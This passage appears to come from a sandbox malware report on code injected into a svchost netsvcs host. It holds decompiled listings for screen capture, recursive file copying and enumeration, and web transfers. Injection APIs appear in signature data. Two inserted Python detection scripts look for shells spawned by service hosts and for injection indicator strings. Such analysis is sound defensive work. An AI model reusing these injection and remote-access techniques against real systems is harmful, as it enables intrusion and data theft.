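    """Case-folded file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def service_group(cmdline):
    """Return the '-k <group>' of an svchost command line, lower-cased, or None."""
    m = GROUP_RE.search(cmdline)
    return m.group(1).lower() if m else None


def detect_service_host_shells(events):
    """One finding per shell process whose parent is a service host."""
    findings = []
    for ev in events:
        if _base(ev.image) not in SHELLS or _base(ev.parent_image) not in SERVICE_HOSTS:
            continue
        parent_dir = ntpath.dirname(ev.parent_image).lower()
        findings.append({
            "child_pid": ev.pid,
            "parent_pid": ev.parent_pid,
            "service_group": service_group(ev.parent_command_line),
            "parent_in_system_dir": parent_dir in LEGIT_HOST_DIRS,
            "reason": "service host spawned a command shell",
        })
    return findings


# Constructed sample telemetry (hypothetical PIDs and paths).
SAMPLE_EVENTS = [
    ProcEvent(1204, r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs -p",
              652, r"C:\Windows\System32\services.exe", "services.exe"),
    # the injected netsvcs host starting its shell: should be flagged
    ProcEvent(5520, r"C:\Windows\System32\cmd.exe", "cmd.exe",
              1204, r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs -p"),
    # an interactive user shell: benign
    ProcEvent(6012, r"C:\Windows\System32\cmd.exe", 'cmd.exe /c "echo hi"',
              4400, r"C:\Windows\explorer.exe", "explorer.exe"),
    # a masquerading svchost.exe outside System32 (no -k group): should be flagged too
    ProcEvent(7300, r"C:\Windows\System32\cmd.exe", "cmd.exe",
              7200, r"C:\Users\bob\AppData\Roaming\svchost.exe", "svchost.exe"),
    ProcEvent(6100, r"C:\Windows\System32\conhost.exe", "conhost.exe 0x4",
              5520, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
]


if __name__ == "__main__":
    for finding in detect_service_host_shells(SAMPLE_EVENTS):
        print(finding)
```

The second finding (parent outside System32, no service group) is a different problem from the first (a genuine netsvcs host that has been injected), which is why the finding carries both facts rather than a single score.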

C-Code - Quality: 15%
                                                            			E0000022B22BAF545190(void* __ecx, intOrPtr __edx, void* __eflags, long long __rbx, long long* __rcx, long long __rsi) {
                                                            				void* __rdi;
                                                            				void* _t153;
                                                            				signed long long _t157;
                                                            				void* _t194;
                                                            				long long* _t197;
                                                            				signed int _t199;
                                                            				void* _t201;
                                                            				signed long long _t202;
                                                            
                                                            				_t162 = __rbx;
                                                            				_t153 = __eflags;
                                                            				 *((long long*)(_t201 + 0x10)) = __rbx;
                                                            				 *(_t201 + 0x18) = _t199;
                                                            				 *((long long*)(_t201 + 0x20)) = __rsi;
                                                            				_t202 = _t201 - 0x190;
                                                            				_t157 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				 *(_t202 + 0x180) = _t157 ^ _t202;
                                                            				_t197 = __rcx;
                                                            				 *__rcx = 0xaf589380;
                                                            				E0000022B22BAF5444A0(__eflags, __rbx, __rcx + 0xc8, _t194, __rcx);
                                                            				if (_t153 == 0) goto 0xaf5451ff;
                                                            				if (_t153 == 0) goto 0xaf5451ff;
                                                            				if (_t153 == 0) goto 0xaf5451ff;
                                                            				if (_t153 == 0) goto 0xaf5451ff;
                                                            				if (__edx - 0xfffffffffffffff2 == 0x10) goto 0xaf5451ff;
                                                            				 *((intOrPtr*)(__rcx + 0xa0)) = 0x20;
                                                            				goto 0xaf545205;
                                                            				 *((intOrPtr*)(__rcx + 0xa0)) = __edx;
                                                            				if (E0000022B22BAF548D10(_t162, __rcx, _t194) == 0) goto 0xaf54521f;
                                                            				ReleaseDC(??, ??);
                                                            				GetDesktopWindow();
                                                            				 *((long long*)(_t197 + 0x1d0)) = 0xaf589380;
                                                            				GetDC(??);
                                                            				 *((long long*)(_t197 + 0x48)) = 0xaf589380;
                                                            				 *((intOrPtr*)(_t197 + 0x14)) = 0xcc0020;
                                                            				 *((char*)(_t197 + 8)) = 2;
                                                            				 *((intOrPtr*)(_t197 + 0xc)) = 0x64;
                                                            				 *((intOrPtr*)(_t197 + 0x10)) = dil;
                                                            				GetDesktopWindow();
                                                            				__imp__MonitorFromWindow();
                                                            				 *((intOrPtr*)(_t202 + 0x30)) = 0x68;
                                                            				GetMonitorInfoW(??, ??);
                                                            				 *((intOrPtr*)(_t202 + 0xe4)) = 0xdc;
                                                            				EnumDisplaySettingsW(??, ??, ??);
                                                            				 *(_t197 + 0x28) =  *(_t202 + 0x14c);
                                                            				 *(_t197 + 0x2c) =  *(_t202 + 0x150);
                                                            				asm("cdq");
                                                            				 *((intOrPtr*)(_t197 + 0x30)) = 0;
                                                            				 *((char*)(_t197 + 0x24)) = 0x20 /  *(_t197 + 0xa0);
                                                            				CreateCompatibleDC(??);
                                                            				 *((long long*)(_t197 + 0x58)) = 0xaf589380;
                                                            				CreateCompatibleDC(??);
                                                            				 *((long long*)(_t197 + 0xb8)) = 0xaf589380;
                                                            				CreateCompatibleDC(??);
                                                            				 *((long long*)(_t197 + 0x50)) = 0xaf589380;
                                                            				CreateCompatibleDC(??);
                                                            				r8d =  *(_t197 + 0x28);
                                                            				_t38 = _t199 + 1; // 0x1
                                                            				r9d = _t38;
                                                            				 *((long long*)(_t197 + 0x60)) = 0xaf589380;
                                                            				 *(_t197 + 0x78) = _t199;
                                                            				 *(_t197 + 0x80) = _t199;
                                                            				E0000022B22BAF545740( *(_t197 + 0xa0), 0xaf589380, _t162, _t197, _t197, _t199);
                                                            				r9d =  *(_t197 + 0x2c);
                                                            				r8d =  *(_t197 + 0x28);
                                                            				 *((long long*)(_t197 + 0x88)) = 0xaf589380;
                                                            				E0000022B22BAF545740( *(_t197 + 0xa0), 0xaf589380, _t162, _t197, _t197, _t199);
                                                            				r8d =  *(_t197 + 0x28);
                                                            				_t48 = _t199 + 1; // 0x1
                                                            				r9d = _t48;
                                                            				 *((long long*)(_t197 + 0x90)) = 0xaf589380;
                                                            				E0000022B22BAF545740( *(_t197 + 0xa0), 0xaf589380, _t162, _t197, _t197, _t199);
                                                            				r8d = 0;
                                                            				 *((intOrPtr*)(_t202 + 0x28)) = 0;
                                                            				 *((long long*)(_t197 + 0x98)) = 0xaf589380;
                                                            				 *(_t202 + 0x20) = _t199;
                                                            				CreateDIBSection(??, ??, ??, ??, ??, ??);
                                                            				r8d = 0;
                                                            				 *((intOrPtr*)(_t202 + 0x28)) = 0;
                                                            				 *((long long*)(_t197 + 0x68)) = 0xaf589380;
                                                            				 *(_t202 + 0x20) = _t199;
                                                            				CreateDIBSection(??, ??, ??, ??, ??, ??);
                                                            				 *((long long*)(_t197 + 0x70)) = 0xaf589380;
                                                            				r8d = 0;
                                                            				 *((intOrPtr*)(_t202 + 0x28)) = 0;
                                                            				 *(_t202 + 0x20) = _t199;
                                                            				CreateDIBSection(??, ??, ??, ??, ??, ??);
                                                            				 *((long long*)(_t197 + 0xc0)) = 0xaf589380;
                                                            				SelectObject(??, ??);
                                                            				SelectObject(??, ??);
                                                            				SelectObject(??, ??);
                                                            				r9d =  *(_t197 + 0x28);
                                                            				r8d = 0;
                                                            				 *(_t202 + 0x20) =  *(_t197 + 0x2c);
                                                            				SetRect(??, ??, ??, ??, ??);
                                                            				E0000022B22BAF55A828( *( *((intOrPtr*)(_t197 + 0x90)) + 0x14),  *((intOrPtr*)(_t197 + 0x90)));
                                                            				 *((long long*)(_t197 + 0x18)) = 0xaf589380;
                                                            				 *((intOrPtr*)(_t197 + 0x20)) = 0;
                                                            				 *(_t197 + 0xa4) =  *( *((intOrPtr*)(_t197 + 0x90)) + 0x14) /  *(_t197 + 0x2c);
                                                            				return E0000022B22BAF55A7C0( *((intOrPtr*)(_t197 + 0xc0)) +  *((intOrPtr*)(_t197 + 0xc0)), _t197,  *(_t202 + 0x180) ^ _t202);
                                                            			}
Address column for E0000022B22BAF545190: 0x22baf545190 to 0x22baf545476, 91 addresses in listing order, one per statement of the decompiled body above (the instruction text was not captured in this export).

Memory Dump Source
• Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
Similarity
• API ID: Create$Compatible$ObjectSectionSelectWindow$DesktopMonitor$CursorDisplayEnumFromInfoLoadRectReleaseSettings
• String ID: h
• API String ID: 4226666810-2439710439
• Opcode ID: 6afb788c6d877dd801437169d4e9bc8d2bcc631692589c2de25a78b587554336
• Instruction ID: 487fac339fb10991d7dc2a6279364a8e4a0f9971c3c612eb87de43d982bce0e1
• Opcode Fuzzy Hash: 6afb788c6d877dd801437169d4e9bc8d2bcc631692589c2de25a78b587554336
• Instruction Fuzzy Hash: 55810377600B84ABEB75DF66F44878AB7A1F749B94F404116DB9A03B6ACF39E045CB00
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
Similarity
• API ID: AddressLibraryLoadProc$CloseHandleProcessVirtual$AllocCreateFreeMemoryObjectOpenRemoteSingleThreadVersionWaitWrite
• String ID: @$NtCreateThreadEx$RtlAdjustPrivilege$RtlCreateUserThread$ntdll.dll
• API String ID: 1281333451-61639166
• Opcode ID: d1eb00ed172a1201c92b193bb75822132a94aa4826c82e80ec1090534ef58fb6
• Instruction ID: b56d4a13229e99aeb99226d1b050ec4fa5341635bcc8c494315311515f8d6d6c
• Opcode Fuzzy Hash: d1eb00ed172a1201c92b193bb75822132a94aa4826c82e80ec1090534ef58fb6
• Instruction Fuzzy Hash: DC518333604B40A6EB769F56F84C39A73A1FB89B91F484524DE8D43B5ADF39C5458700
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
Similarity
• API ID: ErrorLast$CurrentThread$EventSelectTimerWaitableconnectsend$CloseCreateEventsHandleMultipleWait
• String ID:
• API String ID: 1791436937-0
• Opcode ID: c55a559a95b8471c2ba4b96d2488654afb3e37b857d3c8f78ac58debbc8c17bc
• Instruction ID: 0ae2e573eeb4016e27d0b4152b1cdb00bd929aef62575682ddfd7818951aaa77
• Opcode Fuzzy Hash: c55a559a95b8471c2ba4b96d2488654afb3e37b857d3c8f78ac58debbc8c17bc
• Instruction Fuzzy Hash: 1AE1B033600A40A6EB768FBAD85C39D37A0FB48B94F154625DE1A877DADF3AC845C740
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
Similarity
• API ID: Service$CloseHandleLocal$Free$AllocEnumOpenServicesStatus$ConfigManagerQuery
• String ID: -k netsvcs
• API String ID: 2067902596-1604415765
• Opcode ID: 2288ee3aaf89ef1cf841c30b8f1e5c1043746bc526fc9fc93235c2acc9007efd
• Instruction ID: c522a37b900c8b15536ea159a955bf601600d2d14cf3ca7401fa9fd4dc7c2471
• Opcode Fuzzy Hash: 2288ee3aaf89ef1cf841c30b8f1e5c1043746bc526fc9fc93235c2acc9007efd
• Instruction Fuzzy Hash: 74719C37619B80A6EB768B96F84C39AB7E5F788B81F0445159E8A43B59DF3EC405CB00
Uniqueness
• Uniqueness Score: -1.00%
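Added example, not from the report or the sample: two of the function summaries above describe, first, injection support resolved by name from ntdll.dll (NtCreateThreadEx, RtlCreateUserThread and RtlAdjustPrivilege next to OpenProcess, VirtualAllocEx, WriteProcessMemory and CreateRemoteThread) and, second, a service enumerator that queries each service's configuration and compares it against "-k netsvcs", which is how a svchost.exe instance gets picked as the host for that injection. The script below performs a string-level triage of a memory region for exactly those indicators. It scans both ASCII (GetProcAddress names are always ANSI) and UTF-16LE (the wide strings lstrcmpW compares), records every hit with its encoding and offset, and returns a verdict. The dump bytes are constructed here and are not the .sdmp contents; the indicator names are the report's, the category names and verdict wording are mine.

```python
"""String-level triage of a memory dump for remote-thread injection indicators.

Added example; the buffer built by build_sample_dump() is constructed and is
not the report's .sdmp region.
"""
import re

# Indicator strings taken from the two function summaries in the report.
INDICATORS = {
    "ntdll_thread_exports": (b"NtCreateThreadEx", b"RtlCreateUserThread"),
    "privilege_adjust": (b"RtlAdjustPrivilege",),   # typically SeDebugPrivilege (LUID 20) before OpenProcess
    "loader_target": (b"ntdll.dll",),
    "netsvcs_selector": (b"-k netsvcs",),           # the service-host command-line fragment
}


def find_string(buf, needle):
    """All (encoding, offset) hits of needle in buf, as ASCII and as UTF-16LE."""
    wide = needle.decode("ascii").encode("utf-16-le")
    hits = []
    for enc, pattern in (("ascii", needle), ("utf-16le", wide)):
        hits.extend((enc, m.start()) for m in re.finditer(re.escape(pattern), buf))
    return hits


def triage(buf):
    """Return {category: {indicator: [(encoding, offset), ...]}} plus a verdict string."""
    found = {}
    for category, needles in INDICATORS.items():
        for needle in needles:
            hits = find_string(buf, needle)
            if hits:
                found.setdefault(category, {})[needle.decode()] = hits
    capable = {"ntdll_thread_exports", "loader_target"} <= found.keys()
    if capable and "netsvcs_selector" in found:
        verdict = "remote-thread injection, svchost -k netsvcs targeted"
    elif capable:
        verdict = "remote-thread injection capability"
    else:
        verdict = "no injection indicators"
    return found, verdict


def build_sample_dump():
    """Constructed stand-in for a dumped region: NUL-separated ASCII import names
    (as they sit in an import table or a GetProcAddress string pool) followed by a
    wide service command line, with zero padding between them."""
    pad = b"\x00" * 16
    ascii_part = b"\x00".join(
        [b"ntdll.dll", b"NtCreateThreadEx", b"RtlAdjustPrivilege", b"RtlCreateUserThread"])
    wide_part = "svchost.exe -k netsvcs -p".encode("utf-16-le")
    return pad + ascii_part + pad + wide_part + pad


if __name__ == "__main__":
    found, verdict = triage(build_sample_dump())
    for category, hits in found.items():
        print(category, hits)
    print(verdict)
```

The offsets matter in practice: an ASCII hit inside an import directory and the same name as a wide string in a data section mean different things (static import versus runtime resolution), so the scanner keeps the encoding next to the offset instead of collapsing both into one boolean.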

C-Code - Quality: 36%
                                                            			E0000022B22BAF54AE20(long long __rbx, void* __rcx, void* __rdx) {
                                                            				void* __rdi;
                                                            				void* _t54;
                                                            				void* _t60;
                                                            				void* _t61;
                                                            				signed long long _t72;
                                                            				signed long long _t73;
                                                            				void* _t114;
                                                            				void* _t117;
                                                            				signed long long _t118;
                                                            				void* _t120;
                                                            
                                                            				_t116 = _t117 - 0x7b0;
                                                            				_t118 = _t117 - 0x8b0;
                                                            				_t72 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t73 = _t72 ^ _t118;
                                                            				 *(_t117 - 0x7b0 + 0x7a0) = _t73;
                                                            				_t114 = __rcx;
                                                            				r8d = 0x208;
                                                            				E0000022B22BAF563830(_t54, 0, _t60, _t61, _t117 - 0x7b0 + 0x590, __rdx, __rcx, _t120);
                                                            				lstrcpyW(??, ??);
                                                            				lstrcatW(??, ??);
                                                            				if (CreateDirectoryW(??, ??) != 0) goto 0xaf54aea2;
                                                            				if (GetLastError() != 0xb7) goto 0xaf54b001;
                                                            				 *((long long*)(_t118 + 0x8e0)) = __rbx;
                                                            				FindFirstFileW(??, ??);
                                                            				if (_t73 == 0xffffffff) goto 0xaf54aff9;
                                                            				r8d = 0x208;
                                                            				E0000022B22BAF563830(_t54, 0, _t60, _t61, _t116 + 0x380, _t118 + 0x20, _t114, _t120);
                                                            				lstrcpyW(??, ??);
                                                            				lstrcatW(??, ??);
                                                            				lstrcatW(??, ??);
                                                            				r8d = 0x208;
                                                            				E0000022B22BAF563830(_t54, 0, _t60, _t61, _t116 + 0x170, _t118 + 0x4c, _t114, _t120);
                                                            				lstrcpyW(??, ??);
                                                            				lstrcatW(??, ??);
                                                            				lstrcatW(??, ??);
                                                            				if (( *(_t118 + 0x20) & 0x00000010) == 0) goto 0xaf54afcc;
                                                            				if (lstrcmpW(??, ??) == 0) goto 0xaf54afcc;
                                                            				if (lstrcmpW(??, ??) == 0) goto 0xaf54afcc;
                                                            				if (CreateDirectoryW(??, ??) != 0) goto 0xaf54afb7;
                                                            				if (GetLastError() != 0xb7) goto 0xaf54afe3;
                                                            				E0000022B22BAF54AE20(_t73, _t116 + 0x380, _t116 + 0x170);
                                                            				goto 0xaf54afe3;
                                                            				r8d = 0;
                                                            				CopyFileW(??, ??, ??);
                                                            				if (FindNextFileW(??, ??) != 0) goto 0xaf54aed0;
                                                            				return E0000022B22BAF55A7C0(_t54, _t73,  *(_t116 + 0x7a0) ^ _t118);
                                                            			}
Address column for E0000022B22BAF54AE20: 0x22baf54ae24 to 0x22baf54b01a, 36 addresses in listing order, one per statement of the decompiled body above (the instruction text was not captured in this export).

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$Filelstrcpy$CreateDirectoryErrorFindLastlstrcmp$CopyFirstNext
                                                            • String ID:
                                                            • API String ID: 2173410017-0
                                                            • Opcode ID: 5be340f3481fc6aa81c52eaaf9161cdb88cbfe3b0d8b9c89914eade7bfd48419
                                                            • Instruction ID: a0b15b0343baa5a6c7080cef3b37d3b68eed44370783d0c94e58a158c1f99a9e
                                                            • Opcode Fuzzy Hash: 5be340f3481fc6aa81c52eaaf9161cdb88cbfe3b0d8b9c89914eade7bfd48419
                                                            • Instruction Fuzzy Hash: 1B518F23210A86B5EF729FA1EC5C3DA3362F784B89F844511D51E865EAEF3AC249C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Desktop$Create$MonitorWindow$AddressCompatibleDisplayEnumEventFromInfoLibraryLoadOpenProcSettingsThreadVersion
                                                            • String ID: ($default2$h
                                                            • API String ID: 795108055-3490582903
                                                            • Opcode ID: 5386fe677adde34bc2a11b830201e9cca433c16bbe72ce2ba442d2155dbd97b5
                                                            • Instruction ID: 0b346cc2e5e47389b111cd58f75a6fb258511648225754a833d5d5effc237a82
                                                            • Opcode Fuzzy Hash: 5386fe677adde34bc2a11b830201e9cca433c16bbe72ce2ba442d2155dbd97b5
                                                            • Instruction Fuzzy Hash: E3719B33601B809AEB65DF74E84839D73E4F788B88F008229DA8D8775AEF39C455CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 50%
                                                            			E0000022B22BAF534B90(long long __rcx, long long __rdx, long long __r8) {
                                                            				void* __rbx;
                                                            				void* __rdi;
                                                            				void* __rsi;
                                                            				signed int _t79;
                                                            				void* _t103;
                                                            				signed int _t105;
                                                            				signed int _t106;
                                                            				signed int _t109;
                                                            				void* _t125;
                                                            				void* _t128;
                                                            				void* _t130;
                                                            				void* _t131;
                                                            				void* _t132;
                                                            				void* _t133;
                                                            				void* _t134;
                                                            				signed long long _t149;
                                                            				signed long long _t150;
                                                            				void* _t151;
                                                            				signed short* _t152;
                                                            				signed long long _t153;
                                                            				signed long long _t158;
                                                            				void* _t188;
                                                            				void* _t189;
                                                            				void* _t190;
                                                            				signed long long _t191;
                                                            				void* _t203;
                                                            				void* _t204;
                                                            
                                                            				_t189 = _t190 - 0xdf8;
                                                            				_t191 = _t190 - 0xef8;
                                                            				_t149 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t150 = _t149 ^ _t191;
                                                            				 *(_t189 + 0xde0) = _t150;
                                                            				 *((long long*)(_t191 + 0x48)) = __rdx;
                                                            				 *((long long*)(_t191 + 0x50)) = __rcx;
                                                            				 *((intOrPtr*)(_t191 + 0x30)) = r9d;
                                                            				 *((long long*)(_t191 + 0x40)) = __r8;
                                                            				LocalAlloc(??, ??);
                                                            				 *(_t191 + 0x38) = _t150;
                                                            				wsprintfW(??, ??);
                                                            				FindFirstFileW(??, ??);
                                                            				 *(_t191 + 0x58) = _t150;
                                                            				if (_t150 == 0xffffffff) goto 0xaf534e5a;
                                                            				 *_t150 = 0x74;
                                                            				asm("o16 nop [eax+eax]");
                                                            				_t105 =  *(_t189 - 0x74) & 0x0000ffff;
                                                            				_t130 = _t105 - "."; // 0x2e
                                                            				_t79 =  *(_t189 - 0x72) & 0x0000ffff;
                                                            				if (_t130 != 0) goto 0xaf534c4e;
                                                            				_t131 = _t79 -  *0xaf587872; // 0x0
                                                            				if (_t131 == 0) goto 0xaf534e12;
                                                            				_t132 = _t105 - L".."; // 0x2e
                                                            				if (_t132 != 0) goto 0xaf534c71;
                                                            				_t133 = _t79 -  *0xaf587876; // 0x2e
                                                            				if (_t133 != 0) goto 0xaf534c71;
                                                            				_t134 = ( *(_t189 - 0x70) & 0x0000ffff) -  *0xaf587878; // 0x0
                                                            				if (_t134 == 0) goto 0xaf534e12;
                                                            				_t106 =  *(_t189 + _t150 - 0x74) & 0x0000ffff;
                                                            				 *(_t189 + _t150 + 0x5c0) = _t106;
                                                            				_t151 = _t150 + 2;
                                                            				if (_t106 != 0) goto 0xaf534c73;
                                                            				if ( *((intOrPtr*)(_t191 + 0x30)) == 0) goto 0xaf534c9c;
                                                            				E0000022B22BAF5646B0(0x2800, _t151, _t189 + 0x5c0, _t191 + 0x60);
                                                            				if ( *((intOrPtr*)(_t189 + 0xe40)) != 0) goto 0xaf534cb0;
                                                            				if (( *(_t191 + 0x60) & 0x00000010) != 0) goto 0xaf534db2;
                                                            				if ( *((intOrPtr*)(_t189 + 0xe48)) == 0) goto 0xaf534cd4;
                                                            				E0000022B22BAF563014(_t150, _t189 + 0x5c0,  *((intOrPtr*)(_t191 + 0x40)), _t188, _t203, _t204);
                                                            				goto 0xaf534cfe;
                                                            				_t152 = _t189 + 0x5c0;
                                                            				_t109 =  *(_t152 +  *((intOrPtr*)(_t191 + 0x40)) - _t152) & 0x0000ffff;
                                                            				if (_t151 != 0) goto 0xaf534cf7;
                                                            				_t153 =  &(_t152[1]);
                                                            				if (_t109 != 0) goto 0xaf534ce3;
                                                            				if ((0 | ( *_t152 & 0x0000ffff) - _t109 == 0x00000000) == 0) goto 0xaf534dab;
                                                            				_t36 = _t188 - 0x410; // 0x23f0
                                                            				if (1 - _t36 <= 0) goto 0xaf534d2f;
                                                            				r8d = 0x42;
                                                            				LocalReAlloc(??, ??, ??);
                                                            				 *(_t191 + 0x38) = _t153;
                                                            				 *(_t153 + _t153) =  *(_t191 + 0x60) & 0x10;
                                                            				wsprintfW(??, ??);
                                                            				lstrlenW(??);
                                                            				_t103 = 2 + _t153 * 2;
                                                            				E0000022B22BAF562BA0(2, 2, 0x2c10, _t128, _t189 + 0x1b0 +  *(_t191 + 0x38), _t189 + 0x1b0, __rdx, _t188, _t103);
                                                            				_t158 =  *(_t191 + 0x38);
                                                            				 *((intOrPtr*)(__rdx + _t158)) =  *((intOrPtr*)(_t191 + 0x7c));
                                                            				 *((intOrPtr*)(__rdx + _t158)) =  *((intOrPtr*)(_t189 - 0x80));
                                                            				 *((long long*)(__rdx + _t158)) =  *((intOrPtr*)(_t191 + 0x74));
                                                            				_t125 = 2 + _t103 + 0x10;
                                                            				if (( *(_t191 + 0x60) & 0x00000010) == 0) goto 0xaf534e12;
                                                            				r8d = 0x410;
                                                            				E0000022B22BAF563830(2, 0, _t125, _t128, _t189 + 0x1b0, _t189 + 0x1b0, __rdx, _t103);
                                                            				wsprintfW(??, ??);
                                                            				r9d =  *((intOrPtr*)(_t191 + 0x30));
                                                            				 *((intOrPtr*)(_t191 + 0x28)) =  *((intOrPtr*)(_t189 + 0xe48));
                                                            				 *((intOrPtr*)(_t191 + 0x20)) =  *((intOrPtr*)(_t189 + 0xe40));
                                                            				E0000022B22BAF534B90( *((intOrPtr*)(_t191 + 0x50)), _t189 + 0x1b0,  *((intOrPtr*)(_t191 + 0x40)));
                                                            				if (FindNextFileW(??, ??) != 0) goto 0xaf534c30;
                                                            				if (_t125 - 1 <= 0) goto 0xaf534e46;
                                                            				r9b = 0x3f;
                                                            				r8d = _t125;
                                                            				E0000022B22BAF531FF0( *((intOrPtr*)( *((intOrPtr*)(_t191 + 0x50)) + 8)), _t158);
                                                            				LocalFree(??);
                                                            				FindClose(??);
                                                            				return E0000022B22BAF55A7C0(2,  *((intOrPtr*)(_t191 + 0x50)),  *(_t189 + 0xde0) ^ _t191);
                                                            			}

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FindLocalwsprintf$AllocFile$CloseFirstFreeNextlstrlen
                                                            • String ID: %s\%s$%s\*.*
                                                            • API String ID: 2721355277-1665845743
                                                            • Opcode ID: abdd5a9681e2640ee9af39248f253918e973dcbd9db37a78171373676a17d401
                                                            • Instruction ID: c0661c0a475e20ef63bdfe2f367a3b31b8179bd8e259c3ee45670ed74377fe6b
                                                            • Opcode Fuzzy Hash: abdd5a9681e2640ee9af39248f253918e973dcbd9db37a78171373676a17d401
                                                            • Instruction Fuzzy Hash: 8A81A333200689A6EB719FA9E85C3EE77E0F784798F440126DB49477AADF79C545CB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FindLocal$AllocFile$CloseFirstFreeNextlstrlenwsprintf
                                                            • String ID: %s\*.*$i
                                                            • API String ID: 4084865168-1236837797
                                                            • Opcode ID: 463ae89ab22ca705f386465367e7666356ca74fd6d6a71fc1569614ef2665c13
                                                            • Instruction ID: 7692f92c023837b4a0822229f1c6581f91c2d617bc00e1b4f32d7f42b3ee567b
                                                            • Opcode Fuzzy Hash: 463ae89ab22ca705f386465367e7666356ca74fd6d6a71fc1569614ef2665c13
                                                            • Instruction Fuzzy Hash: 2951F473200781A6EB329F99E85C3EA77A1F384B94F804510DE9A4779ADF3EC445CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Internet$CloseHandle$File$Open$CreateReadWrite
                                                            • String ID: Mozilla/4.0 (compatible)
                                                            • API String ID: 769820311-4055971283
                                                            • Opcode ID: be5a5e1b368cc5108e419e1b9e5fb4be1e551196d225a5f4fd0239b7728a2713
                                                            • Instruction ID: 389b604937b1887fb42a07c63bf41c3b50811f2e00e3e35f62f461835f37e0f3
                                                            • Opcode Fuzzy Hash: be5a5e1b368cc5108e419e1b9e5fb4be1e551196d225a5f4fd0239b7728a2713
                                                            • Instruction Fuzzy Hash: 9F419D73204680A6EB319B91A41DB9AB7A1F789BA9F444515DF9A03F9ADF3EC045CB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$Filewsprintf$CloseDirectoryFirstNextRemove
                                                            • String ID: %s\%s$%s\*.*
                                                            • API String ID: 2470771279-1665845743
                                                            • Opcode ID: f3d3e9b9d549876d5093af9cb419338495f1e6fd6df94ca7809052bbf74254e8
                                                            • Instruction ID: 4bc2b7b4b08819a37e888ac2d3eb2991a9c7dabe718fda27b99fd8bc5f23c7bc
                                                            • Opcode Fuzzy Hash: f3d3e9b9d549876d5093af9cb419338495f1e6fd6df94ca7809052bbf74254e8
                                                            • Instruction Fuzzy Hash: A931C62320464AF1EE329FA5F45C3EAB7A0F745BD0F915211DA9A0369ADF3EC545CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 37%
                                                            			E0000022B22BAF534410(char* __rcx, long long __rbp, long long __r12, long long __r14, long long __r15, void* _a16, void* _a24) {
                                                            				void* _v32;
                                                            				void* _v40;
                                                            				signed int _v48;
                                                            				long long _v62;
                                                            				long long _v70;
                                                            				long long _v78;
                                                            				long long _v86;
                                                            				char _v88;
                                                            				long _t71;
                                                            				signed int _t79;
                                                            				intOrPtr _t123;
                                                            				signed long long _t131;
                                                            				intOrPtr _t138;
                                                            				intOrPtr _t146;
                                                            				void* _t157;
                                                            				void* _t161;
                                                            				void* _t164;
